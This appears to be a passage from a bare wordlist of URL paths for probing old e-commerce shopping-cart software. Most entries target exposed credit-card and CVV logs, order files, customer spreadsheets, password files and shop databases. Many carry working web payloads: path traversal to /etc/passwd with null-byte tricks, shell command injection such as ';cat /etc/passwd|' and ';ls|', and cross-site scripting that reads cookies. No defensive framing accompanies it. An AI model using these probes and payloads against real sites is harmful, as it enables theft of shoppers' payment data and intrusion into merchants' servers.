- /+comersus/database/comersus.mdb
- /+comersus/store/comersus.mdb
- /../../cart32.mdb
- //comersus.mdb
- //comersus/comersus.mdb
- //comersus/database/comersus.mdb
- //database/comersus.mdb
- //shop/
- //shop/?M=A
- //store/
- //store/?M=A
- //store/comersus.mdb
- //store/comersus/comersus.mdb
- //store/comersus/database/comersus.mdb
- //store/database/comersus.mdb
- /ASP/cart/
- /ASP/cart/database/
- /ASP/cart/database/metacart.mdb
- /Bin/cart.pl
- /Bin/cartmanager.cgi
- /Cgi-Bin/cart.pl
- /Cgi-Bin/cartmanager.cgi
- /Cgi/cartmanager.cgi
- /Cybercash/smps*.../merchants/admin.pw
- /DC/Auth_data/auth_user_file.txt
- /DC/Orders/orders.txt
- /DC/auth_data/auth_user_file.txt
- /DC/orders/orders.txt
- /DCShop/Auth_data/auth_user_file.txt
- /DCShop/Orders/orders.txt
- /DCShop/auth_data/auth_user_file.txt
- /DCShop/dcshop_admin.cgi
- /DCShop/orders/orders.txt
- /MIDICART/midicart.mdb
- /Merchant2/
- /Merchant2/INSTALL.txt
- /Merchant2/admin.mv
- /Merchant2/database/
- /Merchant2/modules/
- /ORDERS
- /ORDERS/
- /Orders/
- /Orders/order.log
- /Orders/order_log.dat
- /Orders/order_log_v12.dat
- /Orders/orders.txt
- /Oscommerce/catalog/
- /Oscommerce/catalog/admin/
- /Oscommerce/catalog/admin/orders.php
- /Osecommerce/
- /Osecommerce/admin/
- /Osecommerce/admin/admin/
- /Osecommerce/admin/admin/includes/
- /Osecommerce/admin/admin/includes/functions/
- /Osecommerce/admin/admin/includes/functions/database.php
- /PDG/cvv2.txt
- /PDG/order.txt
- /PDG_Cart
- /PDG_Cart/
- /PDG_Cart/authorizenet.txt
- /PDG_Cart/authorizenets.txt
- /PDG_Cart/cc.txt
- /PDG_Cart/oder.log
- /PDG_Cart/order.log
- /PDG_Cart/shopper.conf
- /PDG_Cart/shopper.config
- /PTSC/db/PTSC.mdb
- /ProcuctCart/pc/pcadmin/
- /ProdctCart/pcadmin/
- /ProductCart/database/EIPC.mdb
- /ProductCart/pc/admin
- /Sales_files/
- /Shop/Shop.sql
- /Shop/info.dat
- /Shop/orders.in
- /Shop/track.db
- /ShopCart2.mdb
- /ShoppingCart/cart.jsp
- /ShoppingCart/orders.inc
- /SiteServer/Admin/
- /SiteServer/Admin/commerce/foundation/DSN.asp
- /SiteServer/Admin/commerce/foundation/domain.asp
- /SiteServer/Admin/commerce/foundation/driver.asp
- /SiteServer/Admin/knowledge/dsmgr/default.asp
- /SiteServer/Admin/knowledge/dsmgr/users/GroupManager.asp
- /SiteServer/Admin/knowledge/dsmgr/users/UserManager.asp
- /SiteServer/Admin/knowledge/persmbr/VsLsLpRd.asp
- /SiteServer/Admin/knowledge/persmbr/VsPrAuoEd.asp
- /SiteServer/Admin/knowledge/persmbr/VsTmPr.asp
- /SiteServer/Admin/knowledge/persmbr/vs.asp
- /SiteServer/Knowledge/Default.asp?ctr=\"><script>alert('Vulnerable')</script>
- /SiteServer/Publishing/
- /SiteServer/Publishing/ViewCode.asp
- /SiteServer/Publishing/viewcode.asp
- /SiteServer/admin/
- /SiteServer/admin/findvserver.asp
- /SiteServer/admin/findvserver.asp?uid=LDAP_Anonymous&pwd=LdapPassword_1
- /Store/admin/Default.asp
- /Store/orders.inc
- /StoreAdmin
- /StoreAdmin/
- /StoreDB
- /StoreDB/
- /WebShop
- /WebShop/
- /WebShop/logs/
- /WebShop/logs/cc.txt
- /WebShop/logs/ck.log
- /WebShop/templates/cc.txt
- /Web_Store
- /Web_Store/web_store.cgi?page=../../../../../../../../../../etc/passwd%00.html
- /Web_store
- /Web_store/
- /Web_store/Admin_files/
- /Web_store/web_store.cgi?page=../../../../../../../../etc/passw
- /Webshop*
- /Webshop/
- /Webshop/*
- /Webstore/
- /_database/shopping400.mdb
- /_private/shopping_cart.mdb
- /_vti_cnf/order.log
- /_vti_cnf/order.txt
- /acart.mdb
- /acart2.mdb
- /acart20.mdb
- /acart2_0.mdb
- /acart2_0/acart2_0.mdb
- /acart2_0/admin/category.asp /acart2_0/admin/error.asp?msg=
- /acart2_0/admin/index.asp?msg=
- /acart2_0/deliver.asp?msg=
- /acart2_0/error.asp?msg=
- /acart2_0/signin.asp?msg=
- /acartpath/signin.asp
- /admin/acart.mdb
- /admin/acart2.mdb
- /admin/acart20.mdb
- /admin/acart2_0.mdb
- /admin/apstore.mdb
- /admin/cart.cgi
- /admin/cgi-bin/.../card.csv
- /admin/cgi-bin/.../card.log
- /admin/cgi-bin/.../card.txt
- /admin/credit_card_info.php
- /admin/customers.csv
- /admin/customers.xls
- /admin/my_customer_base.asp
- /admin/order.dat
- /admin/orders.asp
- /admin/orders.dat
- /admin/orders.php
- /admin/orders/
- /admin/sales.csv
- /admin/sales.xls
- /admin/shop-dat.dat
- /admin/shop_login.htm
- /admin_files/order.log
- /allinurl/comersus/database/comersus.mdb
- /apstore.mdb
- /apstore/apstore.mdb
- /ashopKart20/admin.asp
- /ashopKart20/admin/scart.mdb
- /ashopKart20/scart.mdb
- /ashopkart20+-+ashoptkart20/admin
- /aspcart5.mdb
- /authorize.csv
- /authorize/dbmfiles/users
- /authorizenet.cgi
- /authorizenet.log
- /authorizenets.old
- /backoffice
- /backoffice+
- /backoffice+/
- /backoffice/
- /backoffice/customers.csv
- /backoffice/customers.xls
- /backoffice/index.asp
- /backoffice/login.jsp
- /backoffice/sales.csv
- /backoffice/sales.xls
- /backofficegold
- /backofficegold/
- /backofficegold/customers.csv
- /backofficegold/customers.xls
- /backofficegold/sales.csv
- /backofficegold/sales.xls
- /backofficelite
- /backofficelite/
- /backofficelite/customers.csv
- /backofficelite/customers.xls
- /backofficelite/default.asp
- /backofficelite/sales.csv
- /backofficelite/sales.xls
- /bill
- /billing
- /billing.nsf
- /billing/
- /billing/anyweb0001.htm
- /billing/billing.apw
- /billing/billing.swf
- /billpay/
- /bills
- /bin/DCShop/auth_data/auth_user_file.txt
- /bin/DCShop/orders/orders.txt
- /bin/cart.pl
- /bin/cartmanager.cgi
- /bin/netbilling/
- /bin/netbilling/.dbusers.db
- /bin/netbilling/.htaccess
- /bin/netbilling/.htpasswd
- /bin/netbilling/.htusers
- /bin/netbilling/.passwrd
- /bin/netbilling/WS_FTP.LOG
- /bin/netbilling/crontab.txt
- /bin/netbilling/expire.txt
- /bin/netbilling/htusers
- /bin/netbilling/robots.txt
- /bin/orders/orders.txt
- /bin/shop/auth_data/auth_user_file.txt
- /bin/shop/orders/orders.txt
- /bin/webcash/
- /bin/webcash/.dbusers.db
- /bin/webcash/.htaccess
- /bin/webcash/.htpasswd
- /bin/webcash/.htusers
- /bin/webcash/.passwrd
- /bin/webcash/WS_FTP.LOG
- /bin/webcash/crontab.txt
- /bin/webcash/expire.txt
- /bin/webcash/htusers
- /bin/webcash/robots.txt
- /bookstore/
- /bookstore/shop.mdb
- /bookstore/shopping.mdb
- /card.csv
- /card.log
- /card.txt
- /card/
- /cards/
- /cart
- /cart.cgi
- /cart.pl
- /cart/
- /cart/cart.cgi
- /cart/dealers/
- /cart/dealers/Copy of sql/
- /cart/dealers/Review-Correct.php
- /cart/dealers/Review-Corrects.php
- /cart/dealers/_notes/
- /cart/dealers/enter-order.php
- /cart/dealers/php.php
- /cart/dealers/review-orderAT.php
- /cart/dealers/table-test.htm
- /cart/dealers/untitled/
- /cart/dealers/yes-noas.php
- /cart/dealers/yes-noas2.php
- /cart/file-scripts/
- /cart/file-scripts/_notes/
- /cart/file-scripts/file-lesson-1.html
- /cart/file-scripts/file-lesson-2.html
- /cart/file-scripts/file-lesson-3.html
- /cart/file-scripts/file-perm.php
- /cart/file-scripts/is-readable.htm
- /cart/file-scripts/temp-file.htm
- /cart/file-scripts/test.txt
- /cart/file-scripts/write-to-a.php
- /cart32.exe
- /cart32.mdb
- /cartcart.cgi
- /cartman.php
- /cartman.php?action=add&id=../../../etc/passwd
- /cartman.php?action=add&id=1&descr=1=1&quantity=1
- /cartman.php?action=add&id=1001&descr=MS%20Office%202000&price=119&quantity=1
- /cartmanager.cgi
- /cash/
- /catalog/
- /catalog/admin/
- /catalog/admin/orders.php
- /cbi-bin/shop/
- /cc.csv
- /cc.log
- /cc.txt
- /ccard
- /ccard/
- /ccards/
- /ccv.csv
- /ccv.log
- /ccv.txt
- /cgi-bin-shop/
- /cgi-bin/.../authorize.csv
- /cgi-bin/.../authorize.cvs
- /cgi-bin/.../authorizenet.log
- /cgi-bin/.../authorizenets.old
- /cgi-bin/.../card.csv
- /cgi-bin/.../card.log
- /cgi-bin/.../card.txt
- /cgi-bin/.../cc.csv
- /cgi-bin/.../cc.log
- /cgi-bin/.../cc.txt
- /cgi-bin/.../ccv.csv
- /cgi-bin/.../ccv.log
- /cgi-bin/.../ccv.txt
- /cgi-bin/.../cvv.csv
- /cgi-bin/.../cvv.log
- /cgi-bin/.../cvv.txt
- /cgi-bin/.../cvv2.csv
- /cgi-bin/.../cvv2.log
- /cgi-bin/.../cvv2.txt
- /cgi-bin/.../order.csv
- /cgi-bin/.../order.log
- /cgi-bin/.../order.txt
- /cgi-bin/.../orders.txt
- /cgi-bin/.../shopper.conf
- /cgi-bin/DCShop/Auth_data/auth_user_file.txt
- /cgi-bin/DCShop/Orders/orders.txt
- /cgi-bin/DCShop/auth_data/auth_user_file.txt
- /cgi-bin/DCShop/dcprotect.pl
- /cgi-bin/DCShop/dcshop_admin.cgi
- /cgi-bin/DCShop/dcshop_admin.setup
- /cgi-bin/DCShop/orders/orders.txt
- /cgi-bin/DCShopAuth_data/auth_user_file.txt
- /cgi-bin/OrderForm.cgi
- /cgi-bin/Orders/orders.txt
- /cgi-bin/PDG
- /cgi-bin/PDG_Cart/mc.txt
- /cgi-bin/PDG_Cart/order.log
- /cgi-bin/PDG_cart/card.txt
- /cgi-bin/Web_Store/web_store.cgi
- /cgi-bin/Web_Store/web_store.cgi?page=%00
- /cgi-bin/Web_Store/web_store.cgi?page=../../../path/filename%00ext
- /cgi-bin/Web_store/web_store.cgi
- /cgi-bin/authorizenet.cgi/
- /cgi-bin/cart.pl
- /cgi-bin/cart.pl?db
- /cgi-bin/cart.pl?db='
- /cgi-bin/cart.pl?env
- /cgi-bin/cart.pl?path
- /cgi-bin/cart.pl?vars
- /cgi-bin/cart/
- /cgi-bin/cart/cart.pl?path
- /cgi-bin/cart/cart.pl?vars
- /cgi-bin/cart/pending.dat
- /cgi-bin/cart/vars.dat
- /cgi-bin/cart32.exe
- /cgi-bin/cart32.exe/error
- /cgi-bin/cart32.exe/expdate
- /cgi-bin/cart32.mdb
- /cgi-bin/cart32/
- /cgi-bin/cart32/tempfiles.list
- /cgi-bin/cartmanager.cgi
- /cgi-bin/comersus/store/database/comersus.mdb
- /cgi-bin/comersus/store/shopadmin1.asp
- /cgi-bin/commerce.cgi
- /cgi-bin/commerce.cgi?page=../../../../../../../../../../etc/passwd%00index.html
- /cgi-bin/commerce.cgi?page=../../../../etc/hosts%00index.html
- /cgi-bin/commerce.cgi?page=../../../../etc/paswd%00index.html
- /cgi-bin/commerce.cgi?page=check
- /cgi-bin/conf/merchant_conf
- /cgi-bin/config/datasources/myorder.mdb
- /cgi-bin/cybercash-3.2/conf/merchant_conf
- /cgi-bin/cybercash/
- /cgi-bin/cybercash/conf/merchant_conf
- /cgi-bin/dcshop.cgi
- /cgi-bin/dcshop/Auth_data/auth_user_file.txt
- /cgi-bin/dcshop/Orders/orders.txt
- /cgi-bin/dcshop/auth_data/auth_user_file.txt
- /cgi-bin/dcshop/orders/orders.txt
- /cgi-bin/e-cart
- /cgi-bin/e-cart/cart.txt
- /cgi-bin/ecommerce/
- /cgi-bin/ecommerce/passwords
- /cgi-bin/eshop.pl/seite=;cat%20eshop.pl|
- /cgi-bin/eshop.pl?seite=;cat%20/etc/passwd|
- /cgi-bin/eshop.pl?seite=;ls|
- /cgi-bin/eurodebit/data/.htpasswd
- /cgi-bin/ezmall2000/mall2000.cgi
- /cgi-bin/ezmall2000/mall2000.cgi?page=../../../../../../../bin/comando%20/diretorio/00.html%7c
- /cgi-bin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
- /cgi-bin/ezshopper/loadpage.cgi?user_id=id&file=../data/orders.txt
- /cgi-bin/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
- /cgi-bin/ezshopper2/loadpage.cgi
- /cgi-bin/ezshopper2/loadpage.cgi?+//
- /cgi-bin/ezshopper2/loadpage.cgi?id+/
- /cgi-bin/ezshopper2/loadpage.cgi?id+/subdiretorio/
- /cgi-bin/ezshopper3/loadpage.cgi
- /cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=/
- /cgi-bin/ezshopper3/loadpage.cgi?user_id=&file=//
- /cgi-bin/ezshopper3/loadpage.cgi?user_id=id&file=/
- /cgi-bin/i-shop/
- /cgi-bin/i-shop/admin/store.log
- /cgi-bin/i-shop/admin/store_user_lib.pl
- /cgi-bin/i-shopEire/admin/store.log
- /cgi-bin/i-shopSale/admin/store.log
- /cgi-bin/i-shoppro/
- /cgi-bin/i-shoppro/admin/store.log
- /cgi-bin/ibill
- /cgi-bin/ibill/
- /cgi-bin/ibill/.htpasswd
- /cgi-bin/ibill/mypasswd/.memberfile
- /cgi-bin/ibillpm.pl
- /cgi-bin/ibll
- /cgi-bin/ibll.log
- /cgi-bin/mall2000.cgi
- /cgi-bin/msbill
- /cgi-bin/msbill.log
- /cgi-bin/msbilllog.txt
- /cgi-bin/ncommerce/ExecMacro/orderdspc.d2w/report?
- /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w
- /cgi-bin/ncommerce3/ExecMacro/orderdspc.d2w/report?
- /cgi-bin/netbilling
- /cgi-bin/netbilling/
- /cgi-bin/netbilling/.dbusers.db
- /cgi-bin/netbilling/.htaccess
- /cgi-bin/netbilling/.htpasswd
- /cgi-bin/netbilling/.htusers
- /cgi-bin/netbilling/.passwrd
- /cgi-bin/netbilling/WS_FTP.LOG
- /cgi-bin/netbilling/crontab.txt
- /cgi-bin/netbilling/expire.txt
- /cgi-bin/netbilling/htusers
- /cgi-bin/netbilling/robots.txt
- /cgi-bin/order
- /cgi-bin/order.cgi
- /cgi-bin/order.dat
- /cgi-bin/order.db
- /cgi-bin/order.log
- /cgi-bin/order.mdb
- /cgi-bin/order.txt
- /cgi-bin/order1.log
- /cgi-bin/orderinfo.txt
- /cgi-bin/orderlog.txt
- /cgi-bin/orders.dat
- /cgi-bin/orders.log
- /cgi-bin/orders.mdb
- /cgi-bin/orders.txt
- /cgi-bin/orders/
- /cgi-bin/orders/*.olf
- /cgi-bin/orders/1001.1.log
- /cgi-bin/orders/cc.txt
- /cgi-bin/orders/mc.txt
- /cgi-bin/orders/orders
- /cgi-bin/orders/orders.txt
- /cgi-bin/orders/orders/
- /cgi-bin/orders/track.db
- /cgi-bin/payment.mart
- /cgi-bin/paypal.cgi
- /cgi-bin/paypal/
- /cgi-bin/paypal/command
- /cgi-bin/paypal/test.txt
- /cgi-bin/paypal/test2.txt
- /cgi-bin/paypal/test3.txt
- /cgi-bin/paypal/test4.txt
- /cgi-bin/pdg_cart/order.csv
- /cgi-bin/perlshop.cgi
- /cgi-bin/quikstore.cgi
- /cgi-bin/quikstore.cgi?page=../../../../../../../etc/passwd%00.html&cart_id=
- /cgi-bin/quikstore.cgi?page=../orders/%00html&cart_id=
- /cgi-bin/quikstore.cgi?page=../quikstore.cgi%00html&cart_id=
- /cgi-bin/quikstore.cgi?page=orders/%00html&cart_id=
- /cgi-bin/quikstore.cgi?store='
- /cgi-bin/scripts/cart.pl
- /cgi-bin/scripts/cart.pl?db|cart.pl|All%20Items
- /cgi-bin/scripts/cart.pl?env
- /cgi-bin/scripts/cart.pl?vars
- /cgi-bin/secure/orders
- /cgi-bin/secure/orders/
- /cgi-bin/shop-dat.dat
- /cgi-bin/shop.cgi
- /cgi-bin/shop.cgi/page=../../../../etc/hosts
- /cgi-bin/shop.cgi/page=../../../../etc/passwd
- /cgi-bin/shop.log
- /cgi-bin/shop.pl
- /cgi-bin/shop.pl/page=../../../../etc/passwd
- /cgi-bin/shop.pl?page=xxx
- /cgi-bin/shop/Auth_data/auth_user_file.txt
- /cgi-bin/shop/Orders/orders.txt
- /cgi-bin/shop/auth_data/auth_user_file.txt
- /cgi-bin/shop/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
- /cgi-bin/shop/ezshopper/search.cgi?user_id=id&database=dbase1.exm&template=../../../../../../../etc/passwd&distinct=1
- /cgi-bin/shop/info.dat
- /cgi-bin/shop/orders/orders.txt
- /cgi-bin/shop/pgp_encrypt/cc_store_lib.pm
- /cgi-bin/shop/pgp_encrypt/order_admin.cgi
- /cgi-bin/shop/pgp_encrypt/pgp_lib.pm
- /cgi-bin/shop/pgp_encrypt/print_invoice.cgi
- /cgi-bin/shop/pgp_encrypt/process.cgi
- /cgi-bin/shop/pgp_encrypt/store_admin.cgi
- /cgi-bin/shop/pgp_encrypt/store_params.cgi
- /cgi-bin/shop/pgp_encrypt/validate_card.pm
- /cgi-bin/shop/shop/
- /cgi-bin/shop/smart.cfg
- /cgi-bin/shop/track.db
- /cgi-bin/shopadmin.asp
- /cgi-bin/shopper
- /cgi-bin/shopper.cgi
- /cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
- /cgi-bin/shopper.cgi/&TEMPLATE=ORDER.LOG
- /cgi-bin/shopper.cgi?
- /cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
- /cgi-bin/shopper.cgi?newpage=../../../etc/passwd
- /cgi-bin/shopper.cgi?search=action&keywords=HACK&template=order.log
- /cgi-bin/shopper.cgi?search=action&keywords=TRY%20&template=order.log
- /cgi-bin/shopper.cgi?search=action&keywords=TRY%20&template=order1.log
- /cgi-bin/shopper.exe
- /cgi-bin/shopper.exe?display=action&template=order.log
- /cgi-bin/shopper.exe?key=&20&preadd=action&template=order.log
- /cgi-bin/shopper.exe?search=action&keywords=%20&template=order.log
- /cgi-bin/shopper.exe?search=action&keywords=TryThis&templateds=order.log
- /cgi-bin/shopper.exe?search=action&keywords=musksx&template=order.log
- /cgi-bin/shopper/cheddar/loadpage.cgi
- /cgi-bin/shopping.mdb
- /cgi-bin/shoppper.exe/.../card.log
- /cgi-bin/shoppper.exe/.../card.txt
- /cgi-bin/shoppper.exe/.../order.csv
- /cgi-bin/shoppper.exe/.../order.log
- /cgi-bin/shoppper.exe/.../order.txt
- /cgi-bin/shoppper.exe/PDG_cart/order.log
- /cgi-bin/shopsearch.asp
- /cgi-bin/store.cgi
- /cgi-bin/store.cgi?StartID=../../../../../../../etc/hosts%00
- /cgi-bin/store.cgi?StartID=../etc/hosts%00.html
- /cgi-bin/store.cgi?StartID=../etc/passwd%00.html
- /cgi-bin/store/Admin_files/
- /cgi-bin/store/Admin_files/orders.txt
- /cgi-bin/store/admin_files/order.log
- /cgi-bin/store/agora.cgi?page=hoschi.html
- /cgi-bin/store/dcshop_admin.cgi
- /cgi-bin/store/index.cgi?page=../../../../../../../../etc/passwd
- /cgi-bin/store/pgp_encrypt/cc_store_lib.pm
- /cgi-bin/store/pgp_encrypt/order_admin.cgi
- /cgi-bin/store/pgp_encrypt/pgp_lib.pm
- /cgi-bin/store/pgp_encrypt/print_invoice.cgi
- /cgi-bin/store/pgp_encrypt/process.cgi
- /cgi-bin/store/pgp_encrypt/store_admin.cgi
- /cgi-bin/store/pgp_encrypt/store_params.cgi
- /cgi-bin/store/pgp_encrypt/validate_card.pm
- /cgi-bin/ustorekeeper.pl
- /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
- /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../bin/ls|
- /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../etc/hosts
- /cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../bin/ls
- /cgi-bin/webcart/
- /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;ls|&CODE=PHOLD
- /cgi-bin/webcash
- /cgi-bin/webcash/
- /cgi-bin/webcash/.dbusers.db
- /cgi-bin/webcash/.htaccess
- /cgi-bin/webcash/.htpasswd
- /cgi-bin/webcash/.htusers
- /cgi-bin/webcash/.passwrd
- /cgi-bin/webcash/WS_FTP.LOG
- /cgi-bin/webcash/crontab.txt
- /cgi-bin/webcash/expire.txt
- /cgi-bin/webcash/htusers
- /cgi-bin/webcash/robots.txt
- /cgi-bin2/authorize
- /cgi-bin2/ibll
- /cgi-bin2/ibll.log
- /cgi-bin2/msbill
- /cgi-bin2/msbill.log
- /cgi-bin2/netbilling
- /cgi-bin2/newoordir
- /cgi-bin2/webcash
- /cgi-local/DCShop/auth_data/auth_user_file.txt
- /cgi-local/DCShop/orders/orders.txt
- /cgi-local/PDG_Cart/shopper.conf
- /cgi-local/Web_Store/web_store.cgi
- /cgi-local/cart.pl
- /cgi-local/cybercash-3.2/conf/merchant_conf
- /cgi-local/orders/
- /cgi-local/orders/orders.txt
- /cgi-local/shop.cfg
- /cgi-local/shop.cgi
- /cgi-local/shop.cgi/page=../../../../etc/passwd
- /cgi-local/shop.pl
- /cgi-local/shop.pl/SID=947626980.19094/page=;ls|
- /cgi-local/shop.pl/page=%s
- /cgi-local/shop.pl/page=../../../../etc/passwd
- /cgi-local/shop.pl/page=;id|
- /cgi-local/shop.pl/page=;ls|
- /cgi-local/shop/
- /cgi-local/shop/auth_data/auth_user_file.txt
- /cgi-local/shop/orders/orders.txt
- /cgi-local/shop/secure
- /cgi-local/shop/secure/
- /cgi-shop/
- /cgi-shop/?open
- /cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc%00
- /cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
- /cgi-shop/view_item.pl?HTML_FILE=../../../../../../etc/passwd%00
- /cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00
- /cgi-shop/view_item?HTML_FILE=../../../../../../etc/hosts%00&KEY=1900-0999
- /cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=0000-0000
- /cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=0000-0001
- /cgi-shop/view_item?HTML_FILE=../../../../../../etc/passwd%00&KEY=1900-0999
- /cgi-shop?open
- /cgi-temp/Web_Store/web_store.cgi
- /cgi-win/Web_Store/web_store.cgi
- /cgi-win/netbilling/
- /cgi-win/netbilling/.dbusers.db
- /cgi-win/netbilling/.freshteen
- /cgi-win/netbilling/.htaccess
- /cgi-win/netbilling/.htpasswd
- /cgi-win/netbilling/.htusers
- /cgi-win/netbilling/.passwrd
- /cgi-win/netbilling/WS_FTP.LOG
- /cgi-win/netbilling/crontab.txt
- /cgi-win/netbilling/expire.txt
- /cgi-win/netbilling/htusers
- /cgi-win/netbilling/robots.txt
- /cgi-win/shop/auth_data/auth_user_file.txt
- /cgi-win/shop/orders/orders.txt
- /cgi-win/webcash/
- /cgi-win/webcash/.dbusers.db
- /cgi-win/webcash/.freshteen
- /cgi-win/webcash/.htaccess
- /cgi-win/webcash/.htpasswd
- /cgi-win/webcash/.htusers
- /cgi-win/webcash/.passwrd
- /cgi-win/webcash/WS_FTP.LOG
- /cgi-win/webcash/crontab.txt
- /cgi-win/webcash/expire.txt
- /cgi-win/webcash/htusers
- /cgi-win/webcash/robots.txt
- /cgi/DCShop/auth_data/auth_user_file.txt
- /cgi/DCShop/orders/orders.txt
- /cgi/PDG_Cart/order.log.%207,%200.94,%20/cgi-bin/PDG_cart/card.txt
- /cgi/Web_Store/web_store.cgi
- /cgi/cart.pl
- /cgi/cartmanager.cgi
- /cgi/commerce.cgi
- /cgi/commerce.cgi?page=../../../../etc/hosts%00index.html
- /cgi/i-shop/admin/store.log
- /cgi/i-shoppro/admin/store.log
- /cgi/ibill/
- /cgi/netbilling/
- /cgi/netbilling/.dbusers.db
- /cgi/netbilling/.htaccess
- /cgi/netbilling/.htpasswd
- /cgi/netbilling/.htusers
- /cgi/netbilling/.passwrd
- /cgi/netbilling/WS_FTP.LOG
- /cgi/netbilling/crontab.txt
- /cgi/netbilling/expire.txt
- /cgi/netbilling/htusers
- /cgi/netbilling/robots.txt
- /cgi/order.cgi
- /cgi/orders/orders.txt
- /cgi/webcash/
- /cgi/webcash/.dbusers.db
- /cgi/webcash/.htaccess
- /cgi/webcash/.htpasswd
- /cgi/webcash/.htusers
- /cgi/webcash/.passwrd
- /cgi/webcash/WS_FTP.LOG
- /cgi/webcash/crontab.txt
- /cgi/webcash/expire.txt
- /cgi/webcash/htusers
- /cgi/webcash/robots.txt
- /cgi_bin/DCShop/Auth_data/auth_user_file.txt
- /cgi_bin/DCShop/Orders/orders.txt
- /cgi_bin/DCShop/auth_data/auth_user_file.txt
- /cgi_bin/DCShop/orders/orders.txt
- /cgi_bin/Orders/orders.txt
- /cgi_bin/dcshop/Auth_data/auth_user_file.txt
- /cgi_bin/dcshop/Orders/orders.txt
- /cgi_bin/dcshop/auth_data/auth_user_file.txt
- /cgi_bin/dcshop/orders/orders.txt
- /cgi_bin/orders/orders.txt
- /cgi_bin/shop/Auth_data/auth_user_file.txt
- /cgi_bin/shop/Orders/orders.txt
- /cgi_bin/shop/auth_data/auth_user_file.txt
- /cgi_bin/shop/orders/orders.txt
- /cgibin/DCShop/Auth_data/auth_user_file.txt
- /cgibin/DCShop/Orders/orders.txt
- /cgibin/DCShop/auth_data/auth_user_file.txt
- /cgibin/DCShop/orders/orders.txt
- /cgibin/Orders/orders.txt
- /cgibin/Web_Store/web_store.cgi
- /cgibin/dcshop/Auth_data/auth_user_file.txt
- /cgibin/dcshop/Orders/orders.txt
- /cgibin/dcshop/auth_data/auth_user_file.txt
- /cgibin/dcshop/orders/orders.txt
- /cgibin/ezshopper/loadpage.cgi?user_id=1&file=|cat%20/etc/passwd|
- /cgibin/ezshopper/loadpage.cgi?user_id=id&file=../data/orders.txt
- /cgibin/i-shop/admin/store_user_lib.pl
- /cgibin/ib
- /cgibin/ibill/
- /cgibin/ibll
- /cgibin/ibll.log
- /cgibin/msbill
- /cgibin/msbill.log
- /cgibin/netbilling
- /cgibin/netbilling/
- /cgibin/netbilling/.dbusers.db
- /cgibin/netbilling/.freshteen
- /cgibin/netbilling/.htaccess
- /cgibin/netbilling/.htpasswd
- /cgibin/netbilling/.htusers
- /cgibin/netbilling/.passwrd
- /cgibin/netbilling/WS_FTP.LOG
- /cgibin/netbilling/crontab.txt
- /cgibin/netbilling/expire.txt
- /cgibin/netbilling/htusers
- /cgibin/netbilling/robots.txt
- /cgibin/orders/orders.txt
- /cgibin/shop/Auth_data/auth_user_file.txt
- /cgibin/shop/Orders/orders.txt
- /cgibin/shop/auth_data/auth_user_file.txt
- /cgibin/shop/orders/orders.txt
- /cgibin/shopper.cgi?search=action&keywords=TRY%20&template=order.log
- /cgibin/webcash
- /cgibin/webcash/
- /cgibin/webcash/.dbusers.db
- /cgibin/webcash/.htaccess
- /cgibin/webcash/.htpasswd
- /cgibin/webcash/.htusers
- /cgibin/webcash/.passwrd
- /cgibin/webcash/WS_FTP.LOG
- /cgibin/webcash/crontab.txt
- /cgibin/webcash/expire.txt
- /cgibin/webcash/htusers
- /cgibin/webcash/robots.txt
- /cgin-bin2/Web_Store/web_store.cgi
- /cgis/DCShop/auth_data/auth_user_file.txt
- /cgis/DCShop/orders/orders.txt
- /cgis/cart.pl
- /cgis/orders/orders.txt
- /config/checks.txt
- /checkout.php
- /checkout_payment.php
- /checkout_payment.php?payment_error=cc&error=%3Cscript%20language=javascript%3Ewindow.alert%28document.cookie%29;%3C/script%3E
- /checkoutdb.php
- /comersus.mdb
- /comersus/
- /comersus/BackOfficeGold/comersus_backoffice_genericSqlExec.asp
- /comersus/WS_FTP.ini
- /comersus/admin
- /comersus/admin.php
- /comersus/admin/
- /comersus/admin/customers.csv
- /comersus/admin/customers.xls
- /comersus/admin/index.php
- /comersus/admin/sales.csv
- /comersus/backoffice+
- /comersus/backoffice+/
- /comersus/backoffice+/default.asp
- /comersus/backoffice/
- /comersus/backoffice/customers.csv
- /comersus/backoffice/customers.xls
- /comersus/backoffice/default.asp
- /comersus/backoffice/index.asp
- /comersus/backoffice/sales.csv
- /comersus/backoffice/sales.xls
- /comersus/backofficegold/customers.csv
- /comersus/backofficegold/customers.xls
- /comersus/backofficegold/default.asp
- /comersus/backofficegold/sales.csv
- /comersus/backofficegold/sales.xls
- /comersus/backofficelite/chart.gif
- /comersus/backofficelite/comersus_backoffice_index.asp
- /comersus/backofficelite/customers.csv
- /comersus/backofficelite/customers.xls
- /comersus/backofficelite/images/
- /comersus/backofficelite/index.asp
- /comersus/backofficelite/sales.csv
- /comersus/backofficelite/sales.xls
- /comersus/comersus.mdb
- /comersus/comersus/backofficelite/default.asp
- /comersus/database/*
- /comersus/database/admin/index.php
- /comersus/database/comersus.mdb
- /comersus/database/comersus_OfflinepaymentForm.asp
- /comersus/database/comersus_gatewaysecurepay.asp
- /comersus/database/comersus_viewItem.asp
- /comersus/database/sales.xls
- /comersus/databsse/comersus.mdb
- /comersus/diagnosticsAndTools
- /comersus/nhun
- /comersus/store/backofficelite/default.asp
- /comersus/store/comersus.mdb
- /comersus/store/comersus/backofficelite/default.asp
- /comersus/store/comersus/comersus.mdb
- /comersus/store/comersus/databases/comersus.mdb
- /comersus/store/comersus_dbtest.asp
- /comersus/store/comersus_optAuctionListAll.asp
- /comersus/store/comersus_optAuctionListall.asp
- /comersus/store/comersus_optEmailToFriendForm.asp
- /comersus/store/comersus_optForgotPasswordForm.asp
- /comersus/store/comersus_optListBestSellers.asp
